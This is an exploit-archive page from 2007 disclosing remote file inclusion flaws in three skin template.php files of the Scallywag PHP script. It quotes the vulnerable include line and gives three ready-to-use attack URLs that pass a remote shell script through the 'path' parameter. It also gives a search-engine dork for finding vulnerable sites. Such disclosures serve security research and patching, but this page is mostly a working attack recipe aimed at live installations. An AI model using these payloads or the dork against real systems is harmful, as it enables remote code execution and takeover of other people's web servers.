Scallywag (template.php path) Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Scallywag (template.php path) Remote File Inclusion Vulnerabilities
# Published : 2007-05-23
# Author : xoron
# Previous Title : FirmWorX 0.1.2 Multiple Remote File Inclusion Vulnerabilities
# Next Title : NavBoard 2.6.0 Remote Code Execution Exploit
##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                                          #
#                                                                                            # 
#Dork:"Powered by Scallywag"                                                                 #
#                                                                                            #
#                                                                                            # 
##############################################################################################
#Vuln Code                                                                                   #  
#                                                                                            # 
#ERROR1:skin/dark/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]]                #
############################################################################################## 
#                                                                                            # 
#ERROR2:skin/gold/template.php                                                               # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              # 
#                                                                                            # 
#                                                                                            # 
#BUG2:                                                                                       # 
#                                                                                            # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]]                #
##############################################################################################
#                                                                                            # 
#ERROR3:skin/original/template.php                                                           # 
#                                                                                            # 
# <?php                                                                                      # 
# include("$path/source/top.txt"); <<< RFI CODE                                              #
#                                                                                            # 
#                                                                                            # 
#BUG3:                                                                                       # 
#                                                                                            # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]]           #
##############################################################################################
#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################
#                                                                                            # 
#http://www.woweb.ru/load/82-1-0-3791                                                        # 
#                                                                                            # 
############################################################################################## 
#                                                                                            # 
#Cyber-Security                                                                              # 
#                                                                                            # 
##############################################################################################
##############################################################################################

# www.Syue.com [2007-05-23]